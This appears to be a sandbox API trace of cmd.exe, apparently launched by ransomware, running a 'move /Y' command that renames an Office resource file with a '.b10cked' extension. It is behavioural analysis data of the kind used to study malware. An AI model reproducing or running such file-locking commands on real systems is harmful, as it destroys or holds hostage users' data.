dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.399] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa34, dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.399] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa34, dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.400] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa34, dwLength=0x1c | out: lpBuffer=0x12fa34*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.400] GetConsoleOutputCP () returned 0x1b5 [0172.400] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.400] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.400] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.400] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.400] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.400] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.400] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.401] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.401] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.401] GetEnvironmentStringsW () returned 0x1e0210* [0172.401] FreeEnvironmentStringsW (penv=0x1e0210) returned 1 [0172.401] GetEnvironmentStringsW () returned 0x1e0210* [0172.401] FreeEnvironmentStringsW (penv=0x1e0210) returned 1 [0172.401] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9d4 | out: phkResult=0x12e9d4*=0x40) returned 0x0 [0172.401] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0xa0, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.401] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x1, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.401] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x1, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x0, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x40, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x40, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x40, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegCloseKey (hKey=0x40) returned 0x0 [0172.402] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9d4 | out: phkResult=0x12e9d4*=0x40) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x40, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x1, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x1, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x0, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x9, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x4, lpData=0x12e9e0*=0x9, lpcbData=0x12e9d8*=0x4) returned 0x0 [0172.402] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9dc, lpData=0x12e9e0, lpcbData=0x12e9d8*=0x1000 | out: lpType=0x12e9dc*=0x0, lpData=0x12e9e0*=0x9, lpcbData=0x12e9d8*=0x1000) returned 0x2 [0172.402] RegCloseKey (hKey=0x40) returned 0x0 [0172.402] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.402] srand (_Seed=0x5b886388) [0172.402] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"" [0172.402] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"" [0172.402] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.403] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.403] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.403] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.403] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.403] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.403] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.403] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.403] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.403] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0172.403] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.403] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.403] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.403] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.403] GetEnvironmentStringsW () returned 0x1e2360* [0172.404] FreeEnvironmentStringsW (penv=0x1e2360) returned 1 [0172.404] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.404] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.404] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.404] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.404] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.404] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.404] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.404] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.404] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.404] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.404] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.404] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7a0, lpFilePart=0x12f79c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f79c*="Desktop") returned 0x18 [0172.404] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.404] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f51c | out: lpFindFileData=0x12f51c) returned 0x1e09f0 [0172.404] FindClose (in: hFindFile=0x1e09f0 | out: hFindFile=0x1e09f0) returned 1 [0172.404] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f51c | out: lpFindFileData=0x12f51c) returned 0x1e09f0 [0172.405] FindClose (in: hFindFile=0x1e09f0 | out: hFindFile=0x1e09f0) returned 1 [0172.405] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f51c | out: lpFindFileData=0x12f51c) returned 0x1e09f0 [0172.405] FindClose (in: hFindFile=0x1e09f0 | out: hFindFile=0x1e09f0) returned 1 [0172.405] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.405] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.405] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.405] GetEnvironmentStringsW () returned 0x1e0210* [0172.406] FreeEnvironmentStringsW (penv=0x1e0210) returned 1 [0172.406] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.406] GetConsoleOutputCP () returned 0x1b5 [0172.406] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.406] GetUserDefaultLCID () returned 0x409 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8e0, cchData=128 | out: lpLCData="0") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8e0, cchData=128 | out: lpLCData="0") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8e0, cchData=128 | out: lpLCData="1") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.407] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.407] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.408] GetConsoleTitleW (in: lpConsoleTitle=0x1d0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.409] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.409] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.409] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.409] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.410] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.410] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.410] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.410] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.410] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.410] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.410] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0172.414] GetConsoleTitleW (in: lpConsoleTitle=0x12f5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.540] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.540] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.540] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.540] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.540] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.540] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.540] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.540] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.540] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.540] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.540] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.540] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.540] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.540] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.540] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.540] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.540] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.540] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.540] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.540] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.540] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.540] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.540] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.540] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.540] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.540] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.540] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.540] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.540] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.540] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.540] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.542] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f394, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f38c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f38c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.542] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.543] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.543] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0172.543] _wcsicmp (_String1="PPINTL~2.TRX", _String2=".") returned 66 [0172.543] _wcsicmp (_String1="PPINTL~2.TRX", _String2="..") returned 66 [0172.543] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl~2.trx")) returned 0x2020 [0172.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1e1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.543] SetErrorMode (uMode=0x0) returned 0x0 [0172.543] SetErrorMode (uMode=0x1) returned 0x0 [0172.544] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x12ed1c, lpFilePart=0x12ed04 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", lpFilePart=0x12ed04*="PPINTL~2.TRX") returned 0x3c [0172.544] SetErrorMode (uMode=0x0) returned 0x1 [0172.544] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.544] _wcsicmp (_String1="PPINTL~2.TRX", _String2=".") returned 66 [0172.544] _wcsicmp (_String1="PPINTL~2.TRX", _String2="..") returned 66 [0172.544] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl~2.trx")) returned 0x2020 [0172.544] SetErrorMode (uMode=0x0) returned 0x0 [0172.544] SetErrorMode (uMode=0x1) returned 0x0 [0172.544] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x12f198, lpFilePart=0x12ef30 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", lpFilePart=0x12ef30*="PPINTL~2.TRX") returned 0x3c [0172.544] SetErrorMode (uMode=0x0) returned 0x1 [0172.544] SetErrorMode (uMode=0x0) returned 0x0 [0172.544] SetErrorMode (uMode=0x1) returned 0x0 [0172.544] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12f3a0, lpFilePart=0x12ef30 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked", lpFilePart=0x12ef30*="PPINTL.REST.trx_dll.b10cked") returned 0x4b [0172.544] SetErrorMode (uMode=0x0) returned 0x1 [0172.544] SetLastError (dwErrCode=0x0) [0172.544] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.rest.trx_dll.b10cked")) returned 0xffffffff [0172.544] GetLastError () returned 0x2 [0172.544] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x12e8ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8ac) returned 0x1e2130 [0172.545] FindNextFileW (in: hFindFile=0x1e2130, lpFindFileData=0x12e8ac | out: lpFindFileData=0x12e8ac) returned 0 [0172.545] GetLastError () returned 0x12 [0172.545] FindClose (in: hFindFile=0x1e2130 | out: hFindFile=0x1e2130) returned 1 [0172.546] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x1e1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1cc0) returned 0x1e2130 [0172.546] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12eb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0172.546] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x12eb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0172.546] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.rest.trx_dll")) returned 0x2020 [0172.546] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\ppintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.547] FindClose (in: hFindFile=0x1e2130 | out: hFindFile=0x1e2130) returned 1 [0172.547] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eaf8 | out: _Buffer=" 1") returned 9 [0172.547] _get_osfhandle (_FileHandle=1) returned 0x7 